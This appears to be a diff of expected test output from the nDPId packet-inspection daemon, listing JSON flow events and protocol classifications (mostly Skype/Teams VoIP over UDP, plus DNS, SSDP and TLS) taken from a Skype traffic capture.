-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970701461,"flow_last_seen":1431970708429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970701461,"flow_last_seen":1431970708429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970707102,"flow_last_seen":1431970708204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970707102,"flow_last_seen":1431970708204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634728,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634276,"flow_last_seen":1431970660781,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64971,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
